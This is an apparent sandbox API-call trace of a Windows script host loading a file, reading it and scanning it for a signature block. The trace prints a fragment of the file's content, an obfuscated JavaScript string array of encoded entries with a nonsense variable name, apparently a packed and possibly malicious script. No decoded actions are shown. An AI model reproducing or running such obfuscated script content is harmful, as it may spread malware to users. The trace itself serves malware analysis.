	[0058.516] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2ce210, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2ce210*=0x140) returned 1
	[0058.516] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0058.516] ??2@YAPEAX_K@Z () returned 0x66a4f0
	[0058.516] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0058.516] ReadFile (in: hFile=0x140, lpBuffer=0x66a4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x2ce1f0, lpOverlapped=0x0 | out: lpBuffer=0x66a4f0*, lpNumberOfBytesRead=0x2ce1f0*=0x4b68, lpOverlapped=0x0) returned 1
	[0058.517] CoInitialize (pvReserved=0x0) returned 0x1
	[0058.517] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x2ce160 | out: ppv=0x2ce160*=0x66f4c0) returned 0x0
	[0058.521] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cc360 | out: lpSystemTimeAsFileTime=0x2cc360*(dwLowDateTime=0x9b670700, dwHighDateTime=0x1d543d1)) 
	[0058.521] GetCurrentProcessId () returned 0x178
	[0058.521] GetCurrentThreadId () returned 0xa1c
	[0058.521] GetTickCount () returned 0x1f7a6
	[0058.521] QueryPerformanceCounter (in: lpPerformanceCount=0x2cc368 | out: lpPerformanceCount=0x2cc368*=18294679615) returned 1
	[0058.521] malloc (_Size=0x100) returned 0x667c70
	[0058.521] __dllonexit () returned 0x7fee32214c0
	[0058.521] __dllonexit () returned 0x7fee32214e8
	[0058.521] GetVersionExA (in: lpVersionInformation=0x2cc140*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xe3222dc9, dwBuildNumber=0x7fe, dwPlatformId=0xe32214e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x2cc140*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0058.521] GetProcessWindowStation () returned 0x30
	[0058.521] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x2cc128, nLength=0xc, lpnLengthNeeded=0x2cc120 | out: pvInfo=0x2cc128, lpnLengthNeeded=0x2cc120) returned 1
	[0058.521] ??2@YAPEAX_K@Z () returned 0x66f060
	[0058.521] ??2@YAPEAX_K@Z () returned 0x66f0b0
	[0058.521] ??2@YAPEAX_K@Z () returned 0x66f0e0
	[0058.521] ??2@YAPEAX_K@Z () returned 0x66f120
	[0058.521] ??2@YAPEAX_K@Z () returned 0x66f160
	[0058.521] ??2@YAPEAX_K@Z () returned 0x66f1a0
	[0058.521] ??2@YAPEAX_K@Z () returned 0x66f1e0
	[0058.521] ??2@YAPEAX_K@Z () returned 0x66f220
	[0058.521] ??2@YAPEAX_K@Z () returned 0x66f260
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f2a0
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f2e0
	[0058.522] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f330
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f370
	[0058.522] DllGetClassObject (in: rclsid=0x42e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cce30 | out: ppv=0x2cce30*=0x66f0b0) returned 0x0
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f0b0
	[0058.522] IClassFactory:CreateInstance (in: This=0x66f0b0, pUnkOuter=0x0, riid=0x2cdc10*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x2cce50 | out: ppvObject=0x2cce50*=0x66f4c0) returned 0x0
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f3b0
	[0058.522] GetSystemInfo (in: lpSystemInfo=0x2ccc90 | out: lpSystemInfo=0x2ccc90*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0058.522] VirtualQuery (in: lpAddress=0x2ccd00, lpBuffer=0x2cccc0, dwLength=0x30 | out: lpBuffer=0x2cccc0*(BaseAddress=0x2cc000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f3f0
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f410
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f470
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f4a0
	[0058.522] ??2@YAPEAX_K@Z () returned 0x66f550
	[0058.523] IUnknown:AddRef (This=0x66f4c0) returned 0x2
	[0058.523] IUnknown:Release (This=0x66f4c0) returned 0x1
	[0058.523] IUnknown:Release (This=0x66f0b0) returned 0x0
	[0058.523] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.523] IUnknown:QueryInterface (in: This=0x66f4c0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x2ce098 | out: ppvObject=0x2ce098*=0x66f4c0) returned 0x0
	[0058.523] IUnknown:Release (This=0x66f4c0) returned 0x1
	[0058.523] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0058.523] IsTextUnicode (in: lpv=0x66a4f0, iSize=19304, lpiResult=0x2ce0e8 | out: lpiResult=0x2ce0e8) returned 0
	[0058.523] GetACP () returned 0x4e4
	[0058.523] malloc (_Size=0x97d0) returned 0xbdfd0
	[0058.523] GetACP () returned 0x4e4
	[0058.523] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x66a4f0, cbMultiByte=19304, lpWideCharStr=0xbdfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0058.524] realloc (_Block=0xbdfd0, _Size=0x96d0) returned 0xbdfd0
	[0058.524] ??2@YAPEAX_K@Z () returned 0x66f0b0
	[0058.525] free (_Block=0xbdfd0) 
	[0058.525] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.525] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.525] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.525] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.525] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.525] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.525] CoUninitialize () 
	[0058.525] ??3@YAXPEAX@Z () returned 0x5cd4d101
	[0058.525] CloseHandle (hObject=0x140) returned 1
	[0058.525] wcsncmp (_String1="var dogoswoisosfhsdiefgssqda=['wq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0058.525] wcsncmp (_String1="ar dogoswoisosfhsdiefgssqda=['wqt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0058.525] wcsncmp (_String1="r dogoswoisosfhsdiefgssqda=['wqto", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0058.525] wcsncmp (_String1=" dogoswoisosfhsdiefgssqda=['wqtow", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 19
	[0058.525] wcsncmp (_String1="dogoswoisosfhsdiefgssqda=['wqtowq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0058.525] wcsncmp (_String1="ogoswoisosfhsdiefgssqda=['wqtowqj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0058.525] wcsncmp (_String1="goswoisosfhsdiefgssqda=['wqtowqjC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0058.525] wcsncmp (_String1="oswoisosfhsdiefgssqda=['wqtowqjCl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0058.525] wcsncmp (_String1="swoisosfhsdiefgssqda=['wqtowqjClg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.525] wcsncmp (_String1="woisosfhsdiefgssqda=['wqtowqjClg=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.525] wcsncmp (_String1="oisosfhsdiefgssqda=['wqtowqjClg==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0058.525] wcsncmp (_String1="isosfhsdiefgssqda=['wqtowqjClg=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0058.525] wcsncmp (_String1="sosfhsdiefgssqda=['wqtowqjClg==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.525] wcsncmp (_String1="osfhsdiefgssqda=['wqtowqjClg==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0058.525] wcsncmp (_String1="sfhsdiefgssqda=['wqtowqjClg==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.525] wcsncmp (_String1="fhsdiefgssqda=['wqtowqjClg==','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0058.525] wcsncmp (_String1="hsdiefgssqda=['wqtowqjClg==','w5M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0058.525] wcsncmp (_String1="sdiefgssqda=['wqtowqjClg==','w5Mc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.526] wcsncmp (_String1="diefgssqda=['wqtowqjClg==','w5Mcw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0058.526] wcsncmp (_String1="iefgssqda=['wqtowqjClg==','w5Mcwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0058.526] wcsncmp (_String1="efgssqda=['wqtowqjClg==','w5Mcwr/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0058.526] wcsncmp (_String1="fgssqda=['wqtowqjClg==','w5Mcwr/D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0058.526] wcsncmp (_String1="gssqda=['wqtowqjClg==','w5Mcwr/Dv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0058.526] wcsncmp (_String1="ssqda=['wqtowqjClg==','w5Mcwr/Dvc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.526] wcsncmp (_String1="sqda=['wqtowqjClg==','w5Mcwr/DvcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.526] wcsncmp (_String1="qda=['wqtowqjClg==','w5Mcwr/DvcOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0058.526] wcsncmp (_String1="da=['wqtowqjClg==','w5Mcwr/DvcOsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 87
	[0058.526] wcsncmp (_String1="a=['wqtowqjClg==','w5Mcwr/DvcOsK2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0058.526] wcsncmp (_String1="=['wqtowqjClg==','w5Mcwr/DvcOsK2c", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0058.526] wcsncmp (_String1="['wqtowqjClg==','w5Mcwr/DvcOsK2cu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 78
	[0058.526] wcsncmp (_String1="'wqtowqjClg==','w5Mcwr/DvcOsK2cuB", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.526] wcsncmp (_String1="wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.526] wcsncmp (_String1="qtowqjClg==','w5Mcwr/DvcOsK2cuBQ=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0058.526] wcsncmp (_String1="towqjClg==','w5Mcwr/DvcOsK2cuBQ==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0058.526] wcsncmp (_String1="owqjClg==','w5Mcwr/DvcOsK2cuBQ=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0058.526] wcsncmp (_String1="wqjClg==','w5Mcwr/DvcOsK2cuBQ==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.526] wcsncmp (_String1="qjClg==','w5Mcwr/DvcOsK2cuBQ==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 100
	[0058.526] wcsncmp (_String1="jClg==','w5Mcwr/DvcOsK2cuBQ==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0058.526] wcsncmp (_String1="Clg==','w5Mcwr/DvcOsK2cuBQ==','wr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0058.526] wcsncmp (_String1="lg==','w5Mcwr/DvcOsK2cuBQ==','wrv", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0058.526] wcsncmp (_String1="g==','w5Mcwr/DvcOsK2cuBQ==','wrvD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0058.526] wcsncmp (_String1="==','w5Mcwr/DvcOsK2cuBQ==','wrvDp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0058.526] wcsncmp (_String1="=','w5Mcwr/DvcOsK2cuBQ==','wrvDps", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0058.526] wcsncmp (_String1="','w5Mcwr/DvcOsK2cuBQ==','wrvDpsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.526] wcsncmp (_String1=",'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOq", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0058.526] wcsncmp (_String1="'w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.526] wcsncmp (_String1="w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.526] wcsncmp (_String1="5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0058.526] wcsncmp (_String1="Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0058.526] wcsncmp (_String1="cwr/DvcOsK2cuBQ==','wrvDpsOqD8KNw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0058.526] wcsncmp (_String1="wr/DvcOsK2cuBQ==','wrvDpsOqD8KNwp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.526] wcsncmp (_String1="r/DvcOsK2cuBQ==','wrvDpsOqD8KNwpb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0058.526] wcsncmp (_String1="/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0058.527] wcsncmp (_String1="DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.527] wcsncmp (_String1="vcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0058.527] wcsncmp (_String1="cOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0058.527] wcsncmp (_String1="OsK2cuBQ==','wrvDpsOqD8KNwpbCjh8p", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0058.527] wcsncmp (_String1="sK2cuBQ==','wrvDpsOqD8KNwpbCjh8pa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0058.527] wcsncmp (_String1="K2cuBQ==','wrvDpsOqD8KNwpbCjh8pas", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0058.527] wcsncmp (_String1="2cuBQ==','wrvDpsOqD8KNwpbCjh8pasK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0058.527] wcsncmp (_String1="cuBQ==','wrvDpsOqD8KNwpbCjh8pasKg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0058.527] wcsncmp (_String1="uBQ==','wrvDpsOqD8KNwpbCjh8pasKgV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0058.527] wcsncmp (_String1="BQ==','wrvDpsOqD8KNwpbCjh8pasKgV8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 53
	[0058.527] wcsncmp (_String1="Q==','wrvDpsOqD8KNwpbCjh8pasKgV8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0058.527] wcsncmp (_String1="==','wrvDpsOqD8KNwpbCjh8pasKgV8Oz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0058.527] wcsncmp (_String1="=','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0058.527] wcsncmp (_String1="','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.527] wcsncmp (_String1=",'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1x", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0058.527] wcsncmp (_String1="'wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0058.527] wcsncmp (_String1="wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0058.527] wcsncmp (_String1="rvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0058.527] wcsncmp (_String1="vDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7j", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 105
	[0058.527] wcsncmp (_String1="DpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0058.527] wcsncmp (_String1="psOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0058.527] wcsncmp (_String1="sOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
